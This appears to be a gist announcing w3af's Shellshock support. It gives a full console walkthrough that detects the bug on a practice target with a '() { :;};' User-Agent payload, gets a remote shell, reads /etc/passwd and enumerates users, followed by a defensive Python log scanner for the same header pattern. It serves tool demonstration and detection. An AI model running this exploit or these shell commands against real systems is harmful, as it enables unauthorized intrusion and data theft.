w3af can now exploit shell shock!
w3af>>> plugins
w3af/plugins>>> audit shell_shock
w3af/plugins>>> back
w3af>>> target
w3af/config:target>>> set target http://shellshock.notsosecure.com/cgi-bin/status
w3af/config:target>>> back
The configuration has been saved.
w3af>>> start
Shell shock was found at: "http://shellshock.notsosecure.com/cgi-bin/status", using HTTP method GET.
The modified header was: "User-Agent" and it's value was: "() { :;}; echo "shellshock: check"".
This vulnerability was found in the request with id 33.
Scan finished in 8 seconds.
Stopping the core...
w3af>>> exploit
w3af/exploit>>> exploit os_commanding
os_commanding exploit plugin is starting.
Vulnerability successfully exploited.
Generated shell object <os_commanding object (ruser: "pentesterlab" |
rsystem: "Linux vulnerable 3.14.1-pentesterlab")>
Vulnerability successfully exploited. This is a list of available shells and proxies:
- [0] <os_commanding object (ruser: "pentesterlab" | rsystem: "Linux vulnerable 3.14.1-pentesterlab")>
Please use the interact command to interact with the shell objects.
w3af/exploit>>> interact 0
Execute "exit" to get out of the remote shell.
Commands typed in this menu will be run through the os_commanding shell.
w3af/exploit/os_commanding-0>>> e cat /etc/passwd
root:x:0:0:root:/root:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/false
tc:x:1001:50:Linux User,,,:/home/tc:/bin/sh
pentesterlab:x:1000:50:Linux User,,,:/home/pentesterlab:/bin/sh
w3af/exploit/os_commanding-0>>> e ls -la /
total 4
drwxr-xr-x 18 tc staff 400 Sep 25 12:05 .
drwxr-xr-x 18 tc staff 400 Sep 25 12:05 ..
drwxr-xr-x 2 root root 1500 Sep 25 12:05 bin
drwxr-xr-x 2 root root 60 Sep 25 12:05 boot
drwxrwxr-x 14 root staff 4360 Sep 25 12:05 dev
drwxr-xr-x 10 root root 800 Sep 25 14:42 etc
drwxrwxr-x 3 root staff 60 Sep 25 12:05 home
-rwxr-xr-x 1 root root 496 Sep 25 09:57 init
drwxr-xr-x 5 root root 860 Sep 25 12:05 lib
lrwxrwxrwx 1 root root 11 Sep 25 12:05 linuxrc -> bin/busybox
drwxr-xr-x 4 root root 80 Sep 25 12:05 mnt
drwxr-xr-x 2 root root 160 Sep 25 12:05 opt
dr-xr-xr-x 68 root root 0 Sep 25 12:05 proc
drwxrwxr-x 2 root staff 120 Sep 25 12:28 root
drwxrwxr-x 4 root staff 80 Sep 25 12:05 run
drwxr-xr-x 2 root root 1200 Sep 25 12:05 sbin
dr-xr-xr-x 12 root root 0 Sep 25 12:05 sys
drwxrwxrwt 4 root staff 140 Sep 25 12:54 tmp
drwxr-xr-x 8 root root 200 Sep 25 12:05 usr
drwxr-xr-x 9 root root 200 Sep 25 06:30 var
w3af/exploit/os_commanding-0>>> e whoami
pentesterlab
w3af/exploit/os_commanding-0>>> help
Available commands:
help Display this information
lsp List payloads
payload <payload> Execute "payload" and get the result
read <file> Read the remote server <file> and echo to this console
write <file> <content> Write <content> to the remote <file>
upload <local> <remote> Upload <local> file to <remote> location
execute <cmd>
exec <cmd>
e <cmd> Run <cmd> on the remote operating system
exit Exit this shell session
w3af/exploit/os_commanding-0>>> lsp
apache_config_directory
apache_config_files
apache_htaccess
apache_mod_security
...
udp
uptime
users
users_config_files
w3af_agent
w3af/exploit/os_commanding-0>>> payload users
|----------------------------------------------------------------------------|
| User | Home directory | Shell | Description |
|----------------------------------------------------------------------------|
| nobody | /nonexistent/ | /bin/false | nobody |
| root | /root/ | /bin/sh | root |
| tc | /home/tc/ | /bin/sh | Linux User |
| lp | /var/spool/lpd/ | /bin/sh | lp |
| pentesterlab | /home/pentesterlab/ | /bin/sh | Linux User |
|----------------------------------------------------------------------------|
w3af/exploit/os_commanding-0>>> payload cpu_info
|-----------------------------------------------------------------------------|
| Description | Value |
|-----------------------------------------------------------------------------|
| cpu_info | AMD Opteron(TM) Processor 6272 |
| cpu_cores | 1 |
|-----------------------------------------------------------------------------|
w3af/exploit/os_commanding-0>>> payload uptime
|----------------------------------------------------------------------------|
| Description | Hours | Minutes | Seconds |
|----------------------------------------------------------------------------|
| idletime | 25 | 16 | 54 |
| uptime | 25 | 17 | 37 |
|----------------------------------------------------------------------------|
w3af/exploit/os_commanding-0>>>

andresriancho commented Sep 26, 2014

Exploitation is really cool since it doesn't require any third-party host to create a reverse shell, receive the result, etc. nor requires any staging payload: it's all done in one HTTP request/response loop.

The shell-shock exploit source code is available here and, as you'll be able to see, it fits right into our framework.

Try it yourself!

git clone https://github.com/andresriancho/w3af.git
cd w3af
git checkout develop
./w3af_console

And then type the commands above.
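
For defenders, the header value reported in the scan output above doubles as a log signature. The following is an added example, not part of the original gist or of w3af: it scans Apache combined-format access log lines for Referer or User-Agent values that begin like a bash function definition. The function name, field names and sample log lines are assumptions constructed for illustration.

```python
import re

# Apache "combined" log format; quoted fields may hold backslash-escaped quotes.
_Q = r'(?:[^"\\]|\\.)*'
LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>' + _Q + r')" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>' + _Q + r')" "(?P<user_agent>' + _Q + r')"'
)

# The header value in the scan output starts with "() {": a leading "()" then "{".
FUNC_DEF_PREFIX = re.compile(r'^\s*\(\)\s*\{')

# Constructed sample lines (documentation IP ranges), not taken from the page.
SAMPLE_LOG = r'''
192.0.2.10 - - [26/Sep/2014:10:01:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.7 - - [26/Sep/2014:10:01:05 +0000] "GET /cgi-bin/status HTTP/1.1" 200 530 "-" "() { :;}; echo \"shellshock: check\""
198.51.100.7 - - [26/Sep/2014:10:01:09 +0000] "GET /index.html HTTP/1.1" 200 1024 "() { :;}; echo \"shellshock: check\"" "curl/7.38.0"
192.0.2.44 - - [26/Sep/2014:10:02:00 +0000] "GET /js/app.js HTTP/1.1" 200 88 "http://example.com/?q=a(){b}" "Mozilla/5.0"
'''.strip()


def find_shellshock_probes(log_text):
    """Return one finding per logged header value that starts like a bash function definition."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        for field in ("referer", "user_agent"):
            value = m.group(field).replace('\\"', '"')  # undo Apache's quote escaping
            if FUNC_DEF_PREFIX.match(value):
                findings.append({
                    "line": line_no,
                    "host": m.group("host"),
                    "request": m.group("request"),
                    "field": field,
                    "value": value,
                })
    return findings


if __name__ == "__main__":
    for finding in find_shellshock_probes(SAMPLE_LOG):
        print(finding)
```

Only headers that the combined format records are covered; a value placed in any other header will not appear in this log and needs a custom LogFormat or a WAF rule to be seen.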
